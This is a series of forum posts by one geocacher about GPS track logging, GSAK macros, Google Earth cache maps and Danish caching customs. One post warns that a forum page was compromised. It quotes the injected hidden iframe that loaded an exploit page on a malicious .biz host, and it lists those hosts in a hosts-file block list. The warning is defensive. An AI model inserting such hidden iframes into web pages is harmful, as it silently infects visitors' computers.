  1. This must be a fairly new change, since when I downloaded the version 2.90 unit software a week or so ago there was no separate option to download the GPS software. Now when you choose either of them you can subscribe to a mailing list and be notifyed of updates to both packages. ProsperoDK/René
  2. On 11.30 pm, 24. June 2006 I finally had the opportunity to physically visit this beautiful place, the cache was logged virtually a long time ago - but now I finally "finished" it. Dropped of geocaching-buddy Gade as he for a long time had wanted to camp for the night here under the open sky - before he turns 50 in a few days. This then became the opportunity for a long wanted visit. ProsperoDK/René
  3. From the danish Geocaching site www.geocaching.dk click on the link "reklame" then there's a banner where you can enter the danish zipcode (postnummer) and it will give you the link to the 10 closest caches. On the same page click on "Skatte i Danmark (MapPoint)" and you will get a map with all the danish caches marked, you can then zoom in and klik on each cache, it will then open the caches page on GC.com. 4. The smallest time unit you can set it to is 1 sec. 8 hours a day is 28800 seconds per day. That would give you 40,5 days of logging. I could think of doing it for the fun of it, but I don't know if any other function of the GPSr would suffer for having to write to the card constantly. ProsperoDK/René
  5. I can't remember for sure, but I think it was. Doing a little counting and fast math, here's what I come up with: Each track-point takes 113 characters in the GPX-file, there a little overhead from the start and ending of the file, so saying 115 characters would be a safe assumption. On a 128 MB card there's memory enough for 128*1024*1024 = 134217728 characters. That's enough for 134217728/115 = 1167110 track-points (I've rounded down to an integer) The smallest unit of measure for distance I can set it to is 10 m. That would be 100 track-points per kilometer. So I could go on a 11.671,1 kilometer road-trip with it tracking all the way. Is that enough for you? ProsperoDK/René
  6. Take a look at the Java Waypoint editor made by the Danish Geocacher Crumlin on this page. Its primarily made for danish geocachers but should work for others too, there's a description of it on the page. You need to have java installed but by downloading the jar-file to your desktop and start it from there you don't need to start any browser. He updates it occasionally but you can't see the version number on the page only in the program so check back to his page. It works for bothe serial and usb-connected garmin devices, I have had no problem with my GPSmap 60 CSx. ProsperoDK/René
  7. Correct, up to 10.000 track-points. Correct, it will strip the time and limit to max 500 track-points. Correct, it will only be limited by the amount of free memory on the card besides your map-data and poi-data, I read in another thread of someone doing a calculation of how many track-points there could be on a card when tracking 24/7 and it was somewhere between 7-14 days I think on a 512 MB card with about 100 MB of map-data. With the new 2.90 software you can either see how many % is used on the GPSr by looking here: [menu]-[menu]-tracks-[enter]-setup-[enter]-data card setup-[enter] Or use the mass storage mode and look on the PC, you initiate the mass storage mode here: [menu]-[menu]-setup-[enter]-interface-[enter]-usb mass storage-[enter] You exit the mass storage mode by pressing the on/off button. By using the mass storage mode you can copy just copy the GPX files to a directory of your choice. They are saved for each day, but can be stitched together if your trip spanned midnight. I hope this helped you. ProsperoDK/René
  8. I couldn't do it on my version 3 but in the new version 4 beta there's no problem. ProsperoDK/René
  9. I posted this on the GSAK forum yesterday: Somehow the following lines <body> <iframe src="http://traffsale1.biz/dl/adv746.php" width=1 height=1></iframe> <body> have been added at the top and the bottom of the page. It's trying to use the WMF-vulnerability that went out last year, check SANS. Look for the patch from Microsoft, search for KB912919. The patch is here. Taking the names from the SANS article and adding them to my host file pointing to 127.0.0.1 and doing the same with the names with an added 1 as in the iframe above, and applying the patch from Microsoft, I can now enter the forum without my antivirus blowing up with bells and whistles. This is the list I added to my host file (C:\WINDOWS\system32\drivers\etc\hosts): 127.0.0.1 traffsale.biz 127.0.0.1 iframesite.biz 127.0.0.1 iframetraff.biz 127.0.0.1 toolbartraff.biz 127.0.0.1 buytraff.biz 127.0.0.1 iframecash.biz 127.0.0.1 toolbarurl.biz 127.0.0.1 iframebiz.biz 127.0.0.1 toolbarbiz.biz 127.0.0.1 traffsale1.biz 127.0.0.1 iframesite1.biz 127.0.0.1 iframetraff1.biz 127.0.0.1 toolbartraff1.biz 127.0.0.1 buytraff1.biz 127.0.0.1 iframecash1.biz 127.0.0.1 toolbarurl1.biz 127.0.0.1 iframebiz1.biz 127.0.0.1 toolbarbiz1.biz After the scare I did a full scan with McAfee and Spybot - Search & Destroy and fortunately nothing got on my PC, but that took 2½-3 hours to verify. Here's another write-up on the vulnerability: pcdoctor-guide ProsperoDK/René
  10. I'm 37, and found my first cache 10 months and 8 days ago
  11. I use 2 different programs from www.wwmx.org, "WWMX TrackDownload" and "WWMX Location Stamper" to stamp the GPS position in the EXIF data in the picture, the first program to download the track and the second program to stamp the info on the picture. I used the guide here to introduce me to it. And both programs are free. ProsperoDK/René
  12. Here in Denmark we usually don't leave money in caches, but mostly we leave some sort of FTF certificate. The FTFC can be a drawing the kids made or a laminated photo, or a more elaborate laminated paper certificate, and depending on the area where the cache is placed there can be many cachers trying for it, especially if it is a normal cache. It is so exspected that it's usually noted in the online log if there's no FTFC. Sometimes the cacheowner also makes STF and TTF (Second To Find, Third To Find) certificates. My latest FTFC (of the 5 I have) was picked up at 9.15 PM with the help of my trusty flashlight ProsperoDK/René
  13. kml and kmz files are associated with Goggle Earth. You can download Google Earth here earth.google.com. ProsperoDK
  14. I don't think you can do it in GSAK but when you log on to geocaching.com you can place at tick-mark in the "remember me (requires cookies)" box, then when you open an online waypoint URL you are already logged in. I know it works in IE but I think it should work in firefox and netscape too. ProsperoDK/René
  15. I have no idea what you are writing in Finnish, but it seems to me it is about Google Earth. Try loading this file in Google Earth, and then you can see all the caches in Finland with the icons you recognice from geocaching.com. Or you can look here if you want to see caches in more countries. [edited for spelling error] ProsperoDK/René
  16. Inspired by your work with files in the example you gave, and by looking at the documentation for GSAK and seeing this function I noticed that it could make a string act as an array with "," as delimiters. That gave me an idea to recode a script I had made to use a loop instead of repeated chunks of code for basically the same job on different databases. It uses the GETMAIL function to download email (but not loading it into a database), if there was anything downloaded it loads it into a database, generates a CSV-fil (by using GPSbabel) from the database, puts 2 lines of code into a script-file for a FTP-program to upload the new CSV-file and appends a code to a command-line for Internet Explorer. If there was anything downloaded and generated it first calls the FTP-program with the script and then calls Internet Explorer withe the command-line. The file called on my homepage is a PHP-script that based on the arguments pased through imoprts the newly uploaded CSV-files to several MySQL databases. This script also uses looping to re-use code and was what gave me the idea to re-do the macro when I saw the extract-function. All this coding is done so I just click a button in GSAK and get the databases updated on my homepage. I did this repeated updating by hand in the beginning but with more databases it became to time-consuming and boring and prone to errors. The databases is used in when generating KML-files for Google Earth on the fly based on the area you are watching with the help of the Network Link function in Google Earth. The result can be viewed with the KML-files found here. There's links for the Nordic and Baltic countries and several European cities. ProsperoDK/René Boe
  17. Thanks for the heads up on that ClydeE, this macro was made before v.6 so I didn't see that possibility, but I will check it out, perhaps its faster than GPSbabel. And thank you for GSAK, its a great program!! ProsperoDK/René
  18. I have had great help from the documentation from the GSAK homepage here Automating GSAK (Macros) and looking at the macros delivered with GSAK. I have made a macro that 1. selects a database, 2. then it checks if theres a GPX-file in a predefined directory and if there is imports the GPX-file, 3. if it imported a GPX-file it exports a custom CSV-file made with GPSbabel (had to download GPSbabel and look at the documentation there, but it works), 4. this is repeated for 11 databases in GSAK, 5. if any new CSV-files was generated it calls my FTP-program with a script-file that uploads the CSV-files to my homepage, 6. and finally calls Internet Explorer and puts me at the page where I can import the uploaded CSV-files to a MySQL database. All this leads to 11 different kml-files for Google Earth that makes Network Links to show the geocaches in the area you are looking at in GE. This is for the 11 Nordic and Baltic countries including Greenland, Iceland and the Faroe Islands. Take a look here if you would like to see the result of this. The macro capability of GSAK has made this updating task a lot easier. ProsperoDK/René
  19. If you use Google Earth you can take a look here. There's KML-files to load in Google Earth for all the nordic and baltic countries. The files are a Network Link that updates when you change the view and shows the caches in the area you are looking at. When you click on each cache, a window opens with the basic information and a link to geocaching.com for the full info. ProsperoDK/René
  20. If you use Google Earth you can use this link to get a look at the caches in Norway. If you want it for all the Nordic Countries you can take a look here to get links to kml files for all the Countries, the page is in danish, but I think you can figure out what each link is for.
